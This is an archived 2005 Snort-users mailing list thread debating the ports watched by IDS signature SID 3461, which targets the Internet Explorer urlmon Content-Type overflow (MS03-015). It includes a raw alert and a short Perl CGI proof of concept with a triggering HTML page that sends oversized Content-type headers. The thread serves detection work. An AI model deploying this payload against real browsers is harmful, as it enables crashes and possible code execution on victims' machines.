Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: SMTP Content - Type overflow attempt SID 3461

From: hchlai () netscape net
Date: Tue, 25 Oct 2005 15:47:04 -0400
Why should we concern about a vulnerable machine that is located on the "$EXTERNAL_NET"?? Shouldn't this signature be 
written the other way around and detect $SMTP_SERVERS 25 -> $EXTERNAL_NET any instead? 
 
HinSuk
 

-----Original Message-----
From: Alex Kirk <alex.kirk () sourcefire com>
To: Craig Mueller <cmueller () alebra com>
Cc: snort-users () lists sourceforge net
Sent: Mon, 26 Sep 2005 12:37:54 -0400
Subject: Re: [Snort-users] SMTP Content-Type overflow attempt SID 3461


The rule looks for traffic on port 25 because it's possible to exploit this vulnerability via an HTML e-mail message 
(since Outlook uses IE to do HTML rendering). Rules for web-based attacks exist in the Community rules as SIDs 
100000118 and 100000119. 
 
Alex Kirk 
Research Analyst 
Sourcefire, Inc. 
 

I've seen the following alert triggered 

[**] [1:3461:2] SMTP Content-Type overflow attempt [**] 
[Classification: Attempted Administrator Privilege Gain] [Priority: 1] > 09/25-11:11:06.816693 x.y.z.1:35499 -> 
192.168.1.10:25 
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776 
***AP*** Seq: 0xCE9CF6A4 Ack: 0xDEEA2DBD Win: 0x40B0 TcpLen: 20 
[Xref => > http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx][Xref > => 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113][Xref => > http://www.securityfocus.com/bid/7419] 

Yet the Microsoft fix is for Internet Explorer, yet the signature > looks for traffic on port TCP / 25. I think the 
signature should look > for this exploit on TCP port 80 

Attached is the sample exploit, which would also only effect port 80.. 
!/usr/bin/perl 
# 
# Name this file as "urlmon-bo.cgi" 
# 
$LONG="A"x300; 
print "Content-type: $LONG\r\n"; 
print "Content-encoding: $LONG\r\n"; 
print "\r\n"; 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- - 
<html> 
<body> 
<img src="urlmon-bo.cgi"> 
</body> 
</html> 



 
 
------------------------------------------------------- 
SF.Net email is sponsored by: 
Tame your development challenges with Apache's Geronimo App Server. Download 
it for free - -and be entered to win a 42" plasma tv or your very own 
Sony(tm)PSP. Click here to play: http://sourceforge.net/geronimo.php 
_______________________________________________ 
Snort-users mailing list 
Snort-users () lists sourceforge net 
Go to this URL to change user options or unsubscribe: 
https://lists.sourceforge.net/lists/listinfo/snort-users 
Snort-users list archive: 
http://www.geocrawler.com/redir-sf.php3?list=snort-users 
__________________________________________________________________
Look What The New Netscape.com Can Do!
Now you can preview dozens of stories and have the ones you select delivered to you without ever leaving the Top Home 
Page. And the new Tool Box gives you one click access to local Movie times, Maps, White Pages and more.  See for 
yourself at http://netcenter.netscape.com/netcenter/
Previous By Date Next
Previous By Thread Next

Current thread: